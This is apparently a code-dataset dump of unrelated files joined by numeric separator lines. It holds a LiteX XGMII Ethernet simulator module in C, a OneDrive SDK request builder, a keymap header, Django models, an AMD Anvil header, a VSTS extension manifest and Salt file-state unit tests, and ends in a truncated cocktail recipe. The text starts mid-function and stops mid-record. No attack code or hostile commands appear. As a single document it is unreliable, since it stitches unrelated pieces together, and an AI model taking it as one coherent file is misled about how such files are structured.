bus.data |= ((uint64_t) XGMII_CTLCHAR_IDLE) << (idx * 8);
bus.ctl |= 1 << idx;
}
}
// If not transitioned to IDLE state above, remain in RECEIVE
// state.
}
} else {
// No packet to transmit, indicate that we are idle.
bus.data = XGMII_IDLE_DATA;
bus.ctl = XGMII_IDLE_CTL;
}
if (!s->current_rx_len) {
// No packet is currently in transit (or one has just completed
// reception). Check if there is an outstanding packet from the TAP
// interface and copy it into the input buffer
if (s->pending_rx_pkt_head) {
eth_packet_queue_t* popped_rx_pkt;
// CRITICAL REGION {
// Advance the pending packets queue, removing the copied
// packet and freeing its allocated memory.
popped_rx_pkt = s->pending_rx_pkt_head;
s->pending_rx_pkt_head = s->pending_rx_pkt_head->next;
// } CRITICAL REGION
// Determine the maximum length to copy. We must not copy
// beyond the length of s->current_rx_pkt and need to
// reserve at least 4 bytes for the CRC32 to be appended.
size_t copy_len =
(popped_rx_pkt->len
<= sizeof(s->current_rx_pkt) - sizeof(uint32_t))
? popped_rx_pkt->len
: sizeof(s->current_rx_pkt) - sizeof(uint32_t);
// Copy the packet into the buffer
memcpy(s->current_rx_pkt, popped_rx_pkt->data, copy_len);
// Calculate the CRC32 checksum and append it to the
// packet data. This uses the original packet's length. If
// the original packet didn't fit into the buffer, the CRC
// is going to be wrong and thus the packet being cut off
// can be detected.
uint32_t crc = crc32(0, popped_rx_pkt->data, popped_rx_pkt->len);
s->current_rx_pkt[copy_len + 0] = (crc >> 24) & 0xFF;
s->current_rx_pkt[copy_len + 1] = (crc >> 16) & 0xFF;
s->current_rx_pkt[copy_len + 2] = (crc >> 8) & 0xFF;
s->current_rx_pkt[copy_len + 3] = (crc >> 0) & 0xFF;
#ifdef XGMII_RX_DEBUG
fprintf(stderr, "\n----------------------------------\n"
"Received packet with %ld bytes\n", popped_rx_pkt->len);
for (size_t i = 0; i < popped_rx_pkt->len; i++) {
fprintf(stderr, "%02x", popped_rx_pkt->data[i] & 0xff);
if (i != 0 && (i + 1) % 16 == 0) {
fprintf(stderr, "\n");
} else if (i != 0 && (i + 1) % 8 == 0) {
fprintf(stderr, " ");
}
}
fprintf(stderr, "\n----------------------------------\n");
#endif
// Set the packet length (including CRC32) and thus
// indicate that a packet is ready to be transmitted over
// the XGMII interface
s->current_rx_len = copy_len + sizeof(uint32_t);
// Release the packet data memory
free(popped_rx_pkt);
}
}
return bus;
}
/**
* Advance the TX (Sim -> TAP) state machine based on a 64-bit bus word
*
* This method must be called whenever a full 64-bit bus word has been
* transmitted by the device. This means that for a 64-bit bus, it must be
* invoked on the rising clock edge, whereas on a 32-bit (DDR) bus it must be
* invoked on the falling clock edge when the entire 64-bit bus word has been
* transmitted.
*
* This function will detect frames sent by the device and place them on the TAP
* network interface.
*/
static void xgmii_ethernet_tx_adv(xgmii_ethernet_state_t *s, uint64_t time_ps,
xgmii_bus_snapshot_t bus) {
if (s->tx_state == XGMII_TX_STATE_IDLE) {
// Idling until a XGMII start of packet control marker is detected. By
// IEEE802.3, this must be on the first octect of the XGMII bus (which
// replaces one Ethernet preamble octet).
if ((bus.data & 0xFF) == XGMII_CTLCHAR_START && (bus.ctl & 0x01) != 0) {
// The rest of the 64-bit data word must be the remaining 48 bits of
// the preamble and the Ethernet start of frame delimiter. Thus we
// can match on the entire 64-bit data word here. We can't combine
// this check with the one above, as we issue an error if we see a
// XGMII start control character with garbage behind it.
if (bus.data == XGMII_FB_PREAMBLE_SF_DATA
&& bus.ctl == XGMII_FB_PREAMBLE_SF_CTL) {
// XGMII start character, preamble and Ethernet start of frame
// matched, start accepting payload data.
// Reset the current progress
s->current_tx_len = 0;
// Switch to the TRANSMIT state
s->tx_state = XGMII_TX_STATE_TRANSMIT;
} else {
fprintf(stderr, "[xgmii_ethernet]: got XGMII start character, "
"but either Ethernet preamble or start of frame "
"delimiter is not valid: %016lx %02x\n",
bus.data, bus.ctl);
}
} else {
#ifdef XGMII_TX_DEBUG_INVAL_SIGNAL
for (size_t idx = 0; idx < sizeof(xgmii_data_t); idx++) {
if ((bus.ctl & (1 << idx)) != 0) {
if (((bus.data >> (idx * 8)) & 0xFF) != 0x07) {
fprintf(stderr, "[xgmii_ethernet]: got invalid XGMII "
"control character in XGMII_TX_STATE_IDLE: "
"%016lx %02x %lu\n", bus.data, bus.ctl, idx);
}
} else {
fprintf(stderr, "[xgmii_ethernet]: got non-XGMII control "
"character in XGMII_TX_STATE_IDLE without "
"proper XGMII_CTLCHAR_START: %016lx %02x %lu\n",
bus.data, bus.ctl, idx);
}
}
#endif
}
} else if (s->tx_state == XGMII_TX_STATE_TRANSMIT) {
// Iterate over all bytes until we hit an XGMII end of frame control
// character
size_t idx;
bool drop_warning_issued = false;
bool transmission_finished = false;
for (idx = 0; idx < sizeof(xgmii_data_t); idx++) {
// Check whether we are reading a data or control character
if ((bus.ctl & (1 << idx)) == 0) {
// We are reading a data character. If ETH_LEN is reached, drop
// other bytes and issue a warning once.
if (s->current_tx_len <= ETH_LEN) {
s->current_tx_pkt[s->current_tx_len++] =
(uint8_t) (bus.data >> (idx * 8) & 0xFF);
} else if (!drop_warning_issued) {
drop_warning_issued = true;
fprintf(stderr, "[xgmii_ethernet]: TX ETH_LEN reached, "
"dropping frame data. Check the MTU.\n");
}
} else {
// Check what type of control character is received. Only
// XGMII_CTLCHAR_END is valid, all others indicate an error
// condition.
if (((bus.data >> (idx * 8)) & 0xFF) == XGMII_CTLCHAR_END) {
transmission_finished = true;
idx++; // Important to avoid checking the XGMII_CTLCHAR_END
// in the debug for-loop below
break;
} else {
fprintf(stderr, "[xgmii_ethernet]: received non-end XGMII "
"control character in XGMII_TX_STATE_TRANSMIT. "
"Aborting TX. %016lx %02x %lu\n", bus.data, bus.ctl,
idx);
s->tx_state = XGMII_TX_STATE_IDLE;
return;
}
}
}
#ifdef XGMII_TX_DEBUG_INVAL_SIGNAL
// If additional debugging is enabled, also verify that all remaining
// bytes are XGMII idle markers. This must be true, as the only
// possibility for there to be remaining bytes is to exit the loop with
// a break statement, which only happens in the case a XGMII end control
// character is recognized. The next frame can however only start with
// the next 64-bit bus word. Thus the device must fill the rest of the
// 64-bit bus word with idle control characters.
//
// Avoid further incrementing `idx` conditionally due to preprocessor
// macros to prevent introducing tricky bugs.
for (size_t chk_idx = idx; chk_idx < sizeof(xgmii_data_t); chk_idx++) {
if ((bus.ctl & (1 << chk_idx)) == 0
|| ((bus.data >> (chk_idx * 8)) & 0xFF) != XGMII_CTLCHAR_IDLE) {
fprintf(stderr, "[xgmii_ethernet]: received non-XGMII idle "
"control character after XGMII end of frame marker. "
"%016lx %02x %lu\n", bus.data, bus.ctl, chk_idx);
}
}
#endif
// Length without frame check sequence
size_t pkt_len =
(s->current_tx_len > 3) ? s->current_tx_len - 4 : 0;
if (transmission_finished) {
#ifdef XGMII_TX_DEBUG
fprintf(stderr, "\n----------------------------------\n"
"Transmitted packet with %ld bytes\n", pkt_len);
for (size_t i = 0; i < pkt_len; i++) {
fprintf(stderr, "%02x", s->current_tx_pkt[i] & 0xff);
if (i != 0 && (i + 1) % 16 == 0) {
fprintf(stderr, "\n");
} else if (i != 0 && (i + 1) % 8 == 0) {
fprintf(stderr, " ");
}
}
fprintf(stderr, "\n----------------------------------\n");
#endif
if (s->current_tx_len < 4) {
fprintf(stderr, "[xgmii_ethernet]: TX packet too short to contain "
"frame check sequence\n");
} else {
uint32_t crc = crc32(0, s->current_tx_pkt, pkt_len);
if (!((s->current_tx_pkt[pkt_len + 0] == ((crc >> 0) & 0xFF))
&& (s->current_tx_pkt[pkt_len + 1] == ((crc >> 8) & 0xFF))
&& (s->current_tx_pkt[pkt_len + 2] == ((crc >> 16) & 0xFF))
&& (s->current_tx_pkt[pkt_len + 3] == ((crc >> 24) & 0xFF))))
{
fprintf(stderr, "[xgmii_ethernet]: TX packet FCS mismatch. "
"Expected: %08x. Actual: %08x.\n", crc,
(uint32_t) s->current_tx_pkt[pkt_len + 0] << 0
| (uint32_t) s->current_tx_pkt[pkt_len + 1] << 8
| (uint32_t) s->current_tx_pkt[pkt_len + 2] << 16
| (uint32_t) s->current_tx_pkt[pkt_len + 3] << 24);
}
}
// Packet read completely, place it on the TAP interface
tapcfg_write(s->tapcfg, s->current_tx_pkt, s->current_tx_len);
s->tx_state = XGMII_TX_STATE_IDLE;
}
}
}
static int xgmii_ethernet_tick(void *state, uint64_t time_ps) {
xgmii_ethernet_state_t *s = (xgmii_ethernet_state_t*) state;
// ---------- TX BUS (Sim -> TAP) ----------
// Determine the current TX clock edge. Depending on the XGMII_WIDTH, we
// must act on both the rising and falling clock edge.
clk_edge_t tx_edge = clk_edge(&s->tx_clk_edge, *s->tx_clk);
#if XGMII_WIDTH == 64
// 64-bit bus. Sample the entire data on the rising clock edge and process
// accordingly.
if (tx_edge == CLK_EDGE_RISING) {
xgmii_bus_snapshot_t tx_bus = {
.data = *s->tx_data_signal,
.ctl = *s->tx_ctl_signal,
};
xgmii_ethernet_tx_adv(s, time_ps, tx_bus);
}
#elif XGMII_WIDTH == 32
// 32-bit bus. Sample the lower half of the data on the rising clock edge.
if (tx_edge == CLK_EDGE_RISING) {
s->tx_data_posedge = *s->tx_data_signal;
s->tx_ctl_posedge = *s->tx_ctl_signal;
}
// Sample the higher half of the data on the falling clock edge and process
// the joint data from the rising and falling edges.
if (tx_edge == CLK_EDGE_FALLING) {
xgmii_bus_snapshot_t tx_bus = {
.data =
(xgmii_data_t) (*s->tx_data_signal) << XGMII_UPPER_DATA_SHIFT
| (xgmii_data_t) s->tx_data_posedge,
.ctl =
(xgmii_ctl_t) (*s->tx_ctl_signal) << XGMII_UPPER_CTL_SHIFT
| (xgmii_ctl_t) s->tx_ctl_posedge,
};
xgmii_ethernet_tx_adv(s, time_ps, tx_bus);
}
#endif
// ---------- RX BUS (TAP -> Sim) ----------
// Determine the current RX clock edge. Depending on the XGMII_WIDTH, we
// must act on both the rising and falling clock edge.
clk_edge_t rx_edge = clk_edge(&s->rx_clk_edge, *s->rx_clk);
if (rx_edge == CLK_EDGE_RISING) {
// Positive clock edge, advance the RX state and place new contents on
// the XGMII RX bus.
xgmii_bus_snapshot_t rx_bus = xgmii_ethernet_rx_adv(s, time_ps);
#if XGMII_WIDTH == 64
// 64-bit wide bus. We can transmit everything on the positive clock
// edge.
*s->rx_data_signal = rx_bus.data;
*s->rx_ctl_signal = rx_bus.ctl;
#elif XGMII_WIDTH == 32
// 32-bit wide bus. We must transmit the lower half of bits on the
// positive, and the upper half of bits on the negative clock edge.
*s->rx_data_signal = (xgmii_data_signal_t)
rx_bus.data & XGMII_DATA_SIGNAL_MASK;
*s->rx_ctl_signal = (xgmii_ctl_signal_t)
rx_bus.ctl & XGMII_CTL_SIGNAL_MASK;
s->rx_data_negedge = (xgmii_data_signal_t)
((rx_bus.data >> XGMII_UPPER_DATA_SHIFT) & XGMII_DATA_SIGNAL_MASK);
s->rx_ctl_negedge = (xgmii_ctl_signal_t)
((rx_bus.ctl >> XGMII_UPPER_CTL_SHIFT) & XGMII_CTL_SIGNAL_MASK);
#endif
}
#if XGMII_WIDTH == 32
if (rx_edge == CLK_EDGE_FALLING) {
// 32-bit wide bus and negative clock edge. Transmit the data prepared
// on the previous positive clock edge.
*s->rx_data_signal = s->rx_data_negedge;
*s->rx_ctl_signal = s->rx_ctl_negedge;
}
#endif
return RC_OK;
}
int litex_sim_module_get_args(char *args, char *arg, char **val) {
int ret = RC_OK;
json_object *jsobj = NULL;
json_object *obj = NULL;
char *value = NULL;
int r;
jsobj = json_tokener_parse(args);
if (NULL == jsobj) {
fprintf(stderr, "[xgmii_ethernet]: error parsing json arg: %s\n", args);
ret = RC_JSERROR;
goto out;
}
if (!json_object_is_type(jsobj, json_type_object)) {
fprintf(stderr, "[xgmii_ethernet]: arg must be type object!: %s\n",
args);
ret = RC_JSERROR;
goto out;
}
obj = NULL;
r = json_object_object_get_ex(jsobj, arg, &obj);
if (!r) {
fprintf(stderr, "[xgmii_ethernet]: could not find object: \"%s\" "
"(%s)\n", arg, args);
ret = RC_JSERROR;
goto out;
}
value = strdup(json_object_get_string(obj));
out:
*val = value;
return ret;
}
static int litex_sim_module_pads_get(struct pad_s *pads, char *name,
void **signal) {
int ret = RC_OK;
void *sig = NULL;
int i;
if (!pads || !name || !signal) {
ret=RC_INVARG;
goto out;
}
i = 0;
while (pads[i].name) {
if (!strcmp(pads[i].name, name)) {
sig=(void*)pads[i].signal;
break;
}
i++;
}
out:
*signal=sig;
return ret;
}
void event_handler(int tap_fd, short event, void *arg) {
xgmii_ethernet_state_t *s = arg;
// Expect a new TAP packet if the socket has become readable
if (event & EV_READ) {
eth_packet_queue_t *rx_pkt =
malloc(sizeof(eth_packet_queue_t));
// Read the TAP packet into the buffer, extending its length
// to the minimum required Ethernet frame length if necessary.
int read_len = tapcfg_read(s->tapcfg, rx_pkt->data, ETH_LEN);
if (read_len < 0) {
// An error occured while reading from the TAP interface,
// report, free the packet and abort.
fprintf(stderr, "[xgmii_ethernet]: TAP read error %d\n", read_len);
free(rx_pkt);
return;
} else if (read_len < MIN_ETH_LEN) {
// To avoid leaking any data, set the packet's contents
// after the proper received length to zero.
memset(&rx_pkt->data[read_len], 0, MIN_ETH_LEN - read_len);
rx_pkt->len = MIN_ETH_LEN;
} else {
// A packet larger than the minimum Ethernet frame length
// has been read.
rx_pkt->len = read_len;
}
// Packet is inserted into the back of the queue, thus no next
// packet.
rx_pkt->next = NULL;
// CRITICAL REGION {
// Append the received packet to the packet queue
if (!s->pending_rx_pkt_head) {
s->pending_rx_pkt_head = rx_pkt;
s->pending_rx_pkt_tail = rx_pkt;
} else {
s->pending_rx_pkt_tail->next = rx_pkt;
s->pending_rx_pkt_tail = rx_pkt;
}
// } CRITICAL REGION
}
}
static int xgmii_ethernet_add_pads(void *state, struct pad_list_s *plist) {
int ret = RC_OK;
xgmii_ethernet_state_t *s = (xgmii_ethernet_state_t*) state;
struct pad_s *pads;
if (!state || !plist) {
ret = RC_INVARG;
goto out;
}
pads = plist->pads;
if (!strcmp(plist->name, "xgmii_eth")) {
litex_sim_module_pads_get(pads, "rx_data", (void**) &s->rx_data_signal);
litex_sim_module_pads_get(pads, "rx_ctl", (void**) &s->rx_ctl_signal);
litex_sim_module_pads_get(pads, "tx_data", (void**) &s->tx_data_signal);
litex_sim_module_pads_get(pads, "tx_ctl", (void**) &s->tx_ctl_signal);
}
if (!strcmp(plist->name, "sys_clk")) {
// TODO: currently the single sys_clk signal is used for both the RX and
// TX XGMII clock signals. This should be changed. Also, using sys_clk
// does not make sense for the 32-bit DDR bus.
litex_sim_module_pads_get(pads, "sys_clk", (void**)&s->rx_clk);
s->tx_clk = s->rx_clk;
}
out:
return ret;
}
static int xgmii_ethernet_start(void *b) {
base = (struct event_base *) b;
printf("[xgmii_ethernet] loaded (%p)\n", base);
return RC_OK;
}
static int xgmii_ethernet_new(void **state, char *args) {
int ret = RC_OK;
char *c_tap = NULL;
char *c_tap_ip = NULL;
xgmii_ethernet_state_t *s = NULL;
struct timeval tv = {10, 0};
if (!state) {
ret = RC_INVARG;
goto out;
}
s = (xgmii_ethernet_state_t*)malloc(sizeof(xgmii_ethernet_state_t));
if (!s) {
ret = RC_NOENMEM;
goto out;
}
memset(s, 0, sizeof(xgmii_ethernet_state_t));
ret = litex_sim_module_get_args(args, "interface", &c_tap);
if (ret != RC_OK) {
goto out;
}
ret = litex_sim_module_get_args(args, "ip", &c_tap_ip);
if (ret != RC_OK) {
goto out;
}
s->tapcfg = tapcfg_init();
tapcfg_start(s->tapcfg, c_tap, 0);
s->tap_fd = tapcfg_get_fd(s->tapcfg);
tapcfg_iface_set_hwaddr(s->tapcfg, macadr, 6);
tapcfg_iface_set_ipv4(s->tapcfg, c_tap_ip, 24);
tapcfg_iface_set_status(s->tapcfg, TAPCFG_STATUS_ALL_UP);
free(c_tap);
free(c_tap_ip);
s->ev = event_new(base, s->tap_fd, EV_READ | EV_PERSIST, event_handler, s);
event_add(s->ev, &tv);
out:
*state = (void*) s;
return ret;
}
static struct ext_module_s ext_mod = {
"xgmii_ethernet",
xgmii_ethernet_start,
xgmii_ethernet_new,
xgmii_ethernet_add_pads,
NULL,
xgmii_ethernet_tick
};
int litex_sim_ext_module_init(int (*register_module)(struct ext_module_s *)) {
int ret = RC_OK;
// Initiate calculation of zlib's CRC32 lookup table such that multithreaded
// calls to crc32() are safe.
get_crc_table();
ret = register_module(&ext_mod);
return ret;
}
| 14,051 |
912 | # -*- coding: utf-8 -*-
'''
# Copyright (c) 2015 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from .thumbnail_set_request import ThumbnailSetRequest
from ..request_builder_base import RequestBuilderBase
from ..request.thumbnail_request_builder import ThumbnailRequestBuilder
class ThumbnailSetRequestBuilder(RequestBuilderBase):
def __init__(self, request_url, client):
"""Initialize the ThumbnailSetRequestBuilder
Args:
request_url (str): The url to perform the ThumbnailSetRequest
on
client (:class:`OneDriveClient<onedrivesdk.request.one_drive_client.OneDriveClient>`):
The client which will be used for the request
"""
super(ThumbnailSetRequestBuilder, self).__init__(request_url, client)
def request(self, expand=None, select=None, options=None):
"""Builds the ThumbnailSetRequest
Args:
expand (str): Default None, comma-seperated list of relationships
to expand in the response.
select (str): Default None, comma-seperated list of properties to
include in the response.
options (list of :class:`Option<onedrivesdk.options.Option>`):
A list of options to pass into the request. Defaults to None.
Returns:
:class:`ThumbnailSetRequest<onedrivesdk.request.thumbnail_set_request.ThumbnailSetRequest>`:
The ThumbnailSetRequest
"""
req = ThumbnailSetRequest(self._request_url, self._client, options)
req._set_query_options(expand=expand, select=select)
return req
def delete(self):
"""Deletes the specified ThumbnailSet."""
self.request().delete()
def get(self):
"""Gets the specified ThumbnailSet.
Returns:
:class:`ThumbnailSet<onedrivesdk.model.thumbnail_set.ThumbnailSet>`:
The ThumbnailSet.
"""
return self.request().get()
def update(self, thumbnail_set):
"""Updates the specified ThumbnailSet.
Args:
thumbnail_set (:class:`ThumbnailSet<onedrivesdk.model.thumbnail_set.ThumbnailSet>`):
The ThumbnailSet to update.
Returns:
:class:`ThumbnailSet<onedrivesdk.model.thumbnail_set.ThumbnailSet>`:
The updated ThumbnailSet
"""
return self.request().update(thumbnail_set)
@property
def large(self):
"""The large for the ThumbnailSetRequestBuilder
Returns:
:class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
A request builder created from the ThumbnailSetRequestBuilder
"""
return ThumbnailRequestBuilder(self.append_to_request_url("large"), self._client)
@property
def medium(self):
"""The medium for the ThumbnailSetRequestBuilder
Returns:
:class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
A request builder created from the ThumbnailSetRequestBuilder
"""
return ThumbnailRequestBuilder(self.append_to_request_url("medium"), self._client)
@property
def small(self):
"""The small for the ThumbnailSetRequestBuilder
Returns:
:class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
A request builder created from the ThumbnailSetRequestBuilder
"""
return ThumbnailRequestBuilder(self.append_to_request_url("small"), self._client)
@property
def source(self):
"""The source for the ThumbnailSetRequestBuilder
Returns:
:class:`ThumbnailRequestBuilder<onedrivesdk.request.thumbnail_request.ThumbnailRequestBuilder>`:
A request builder created from the ThumbnailSetRequestBuilder
"""
return ThumbnailRequestBuilder(self.append_to_request_url("source"), self._client)
| 1,903 |
791 | #ifndef KEYMAP_H
#define KEYMAP_H
#include "common.h"
typedef enum KeyModifier
{
KM_LeftShift = 1,
KM_RightShift = 2,
KM_Ctrl = 4,
KM_Alt = 8
} KeyModifier;
enum
{
KEY_LEFTSHIFT = 0x2A,
KEY_RIGHTSHIFT = 0x36,
KEY_CTRL = 0x1D,
KEY_ALT = 0x38,
KEY_CAPSLOCK = 0x3A,
KEY_F1 = 0x3B,
KEY_F2 = 0x3C,
KEY_F3 = 0x3D
};
// PC keyboard interface constants
#define KBSTATP 0x64 // kbd controller status port(I)
#define KBS_DIB 0x01 // kbd data in buffer
#define KBDATAP 0x60 // kbd data port(I)
#define NO 0
#define SHIFT (1<<0)
#define CTL (1<<1)
#define ALT (1<<2)
#define CAPSLOCK (1<<3)
#define NUMLOCK (1<<4)
#define SCROLLLOCK (1<<5)
#define E0ESC (1<<6)
// Special keycodes
#define KEY_HOME 0xE0
#define KEY_END 0xE1
#define KEY_UP 0xE2
#define KEY_DOWN 0xE3
#define KEY_LEFT 0xE4
#define KEY_RIGHT 0xE5
#define KEY_PAGEUP 0xE6
#define KEY_PAGEDOWN 0xE7
#define KEY_INSERT 0xE8
#define KEY_DELETE 0xE9
// C('A') == Control-A
#define C(x) (x - '@')
extern uint8_t g_key_map[256];
extern uint8_t g_key_shift_map[256];
#endif //KEYMAP_H | 704 |
865 | from django.contrib.auth.models import AbstractUser
from django.db import models
from django.db.models.signals import post_save
from api.utils.db_functions import make_uuid
class User(AbstractUser):
roles = []
id = models.UUIDField(
primary_key=True,
help_text="ID of user",
default=make_uuid,
editable=True,
)
username = models.CharField(default="", max_length=128, unique=True)
def __str__(self):
return self.username
class Profile(models.Model):
user = models.OneToOneField(
User, related_name="profile", on_delete=models.CASCADE
)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "%s's profile" % self.user
class Meta:
ordering = ("-created_at",)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
post_save.connect(create_user_profile, sender=User)
# Create your models here.
| 387 |
589 | //
// Copyright (c) 2019 Advanced Micro Devices, Inc. All rights reserved.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
#ifndef MISC_RENDERING_SURFACE_CREATE_INFO_H
#define MISC_RENDERING_SURFACE_CREATE_INFO_H
#include "misc/types.h"
namespace Anvil
{
class RenderingSurfaceCreateInfo
{
public:
/* Creates a new rendering surface create info instance. */
static RenderingSurfaceCreateInfoUniquePtr create(Anvil::Instance* in_instance_ptr,
const Anvil::BaseDevice* in_device_ptr,
const Anvil::Window* in_window_ptr,
MTSafety in_mt_safety = Anvil::MTSafety::INHERIT_FROM_PARENT_DEVICE);
~RenderingSurfaceCreateInfo();
const Anvil::BaseDevice* get_device_ptr() const
{
return m_device_ptr;
}
const MTSafety& get_mt_safety() const
{
return m_mt_safety;
}
Anvil::Instance* get_instance_ptr() const
{
return m_instance_ptr;
}
const Anvil::Window* get_window_ptr() const
{
return m_window_ptr;
}
void set_device_ptr(const Anvil::BaseDevice* in_device_ptr)
{
m_device_ptr = in_device_ptr;
}
void set_mt_safety(const MTSafety& in_mt_safety)
{
m_mt_safety = in_mt_safety;
}
void set_instance_ptr(Anvil::Instance* in_instance_ptr)
{
m_instance_ptr = in_instance_ptr;
}
void set_window_ptr(const Anvil::Window* in_window_ptr)
{
m_window_ptr = in_window_ptr;
}
private:
/* Private type definitions */
/* Private functions */
RenderingSurfaceCreateInfo(Anvil::Instance* in_instance_ptr,
const Anvil::BaseDevice* in_device_ptr,
const Anvil::Window* in_window_ptr,
MTSafety in_mt_safety);
/* Private variables */
const Anvil::BaseDevice* m_device_ptr;
Anvil::Instance* m_instance_ptr;
const Anvil::Window* m_window_ptr;
MTSafety m_mt_safety;
};
};
#endif /* MISC_RENDERING_SURFACE_CREATE_INFO_H */
| 1,564 |
631 | {
"manifestVersion": 1.0,
"id": "vss-services-beatpulse-gate",
"name": "Xabaril BeatPulse Release Gate",
"publisher": "luisfraile",
"version": "1.0.1",
"public": true,
"description": "VSTS BeatPulse extensions.",
"categories": ["Build and release"],
"Tags": ["BeatPulse",
"Liveness",
"Release",
"ReleaseGates",
"DevOps"],
"targets": [{
"id": "Microsoft.VisualStudio.Services.Cloud"
}],
"demands": [],
"icons": {
"default": "images/xabaril.png"
},
"branding": {
"color": "#3B3E43",
"theme": "dark"
},
"screenshots": [{
"path": "images/XabarilSample.png"
}],
"files": [
{
"path": "BeatPulseGate"
},
{
"path": "images/xabaril.png",
"addressable": true
},
{
"path": "images/XabarilSample.png",
"addressable": true
}],
"content": {
"details": {
"path": "readme.md"
}
},
"links": {
"license": {
"uri": "https://github.com/Xabaril/Xabaril/blob/master/LICENSE"
}
},
"contributions": [{
"id": "xabaril-beatpulse-gate-task",
"type": "ms.vss-distributed-task.task",
"targets": ["ms.vss-distributed-task.tasks"],
"properties": {
"name": "BeatPulseGate"
}
}]
} | 536 |
9,425 | <gh_stars>1000+
import logging
import os
import pytest
import salt.serializers.json as jsonserializer
import salt.serializers.msgpack as msgpackserializer
import salt.serializers.plist as plistserializer
import salt.serializers.python as pythonserializer
import salt.serializers.yaml as yamlserializer
import salt.states.file as filestate
from salt.exceptions import CommandExecutionError
from tests.support.mock import MagicMock, patch
log = logging.getLogger(__name__)
@pytest.fixture
def configure_loader_modules():
return {
filestate: {
"__env__": "base",
"__salt__": {"file.manage_file": False},
"__serializers__": {
"yaml.serialize": yamlserializer.serialize,
"yaml.seserialize": yamlserializer.serialize,
"python.serialize": pythonserializer.serialize,
"json.serialize": jsonserializer.serialize,
"plist.serialize": plistserializer.serialize,
"msgpack.serialize": msgpackserializer.serialize,
},
"__opts__": {"test": False, "cachedir": ""},
"__instance_id__": "",
"__low__": {},
"__utils__": {},
}
}
# 'absent' function tests: 1
def test_absent():
"""
Test to make sure that the named file or directory is absent.
"""
name = "/fake/file.conf"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
mock_t = MagicMock(return_value=True)
mock_f = MagicMock(return_value=False)
mock_file = MagicMock(side_effect=[True, CommandExecutionError])
mock_tree = MagicMock(side_effect=[True, OSError])
comt = "Must provide name to file.absent"
ret.update({"comment": comt, "name": ""})
with patch.object(os.path, "islink", MagicMock(return_value=False)):
assert filestate.absent("") == ret
with patch.object(os.path, "isabs", mock_f):
comt = "Specified file {} is not an absolute path".format(name)
ret.update({"comment": comt, "name": name})
assert filestate.absent(name) == ret
with patch.object(os.path, "isabs", mock_t):
comt = 'Refusing to make "/" absent'
ret.update({"comment": comt, "name": "/"})
assert filestate.absent("/") == ret
with patch.object(os.path, "isfile", mock_t):
with patch.dict(filestate.__opts__, {"test": True}):
comt = "File {} is set for removal".format(name)
ret.update(
{
"comment": comt,
"name": name,
"result": None,
"changes": {"removed": "/fake/file.conf"},
}
)
assert filestate.absent(name) == ret
with patch.dict(filestate.__opts__, {"test": False}):
with patch.dict(filestate.__salt__, {"file.remove": mock_file}):
comt = "Removed file {}".format(name)
ret.update(
{"comment": comt, "result": True, "changes": {"removed": name}}
)
assert filestate.absent(name) == ret
comt = "Removed file {}".format(name)
ret.update({"comment": "", "result": False, "changes": {}})
assert filestate.absent(name) == ret
with patch.object(os.path, "isfile", mock_f):
with patch.object(os.path, "isdir", mock_t):
with patch.dict(filestate.__opts__, {"test": True}):
comt = "Directory {} is set for removal".format(name)
ret.update(
{"comment": comt, "changes": {"removed": name}, "result": None}
)
assert filestate.absent(name) == ret
with patch.dict(filestate.__opts__, {"test": False}):
with patch.dict(filestate.__salt__, {"file.remove": mock_tree}):
comt = "Removed directory {}".format(name)
ret.update(
{
"comment": comt,
"result": True,
"changes": {"removed": name},
}
)
assert filestate.absent(name) == ret
comt = "Failed to remove directory {}".format(name)
ret.update({"comment": comt, "result": False, "changes": {}})
assert filestate.absent(name) == ret
with patch.object(os.path, "isdir", mock_f):
with patch.dict(filestate.__opts__, {"test": True}):
comt = "File {} is not present".format(name)
ret.update({"comment": comt, "result": True})
assert filestate.absent(name) == ret
| 2,540 |
310 | {
"name": "<NAME>",
"description": "The Jammy Dodger is the best-tasting shot that will ever grace your mouth. You won't be grimacing when you knock this one back!",
"github": "CalumChamberlain",
"ingredients": [
{
"quantity": "3 quarters",
"measure": "shot",
"ingredient": "Chambord (blackberry liquor)"
},
{
"quantity": "1 quarter",
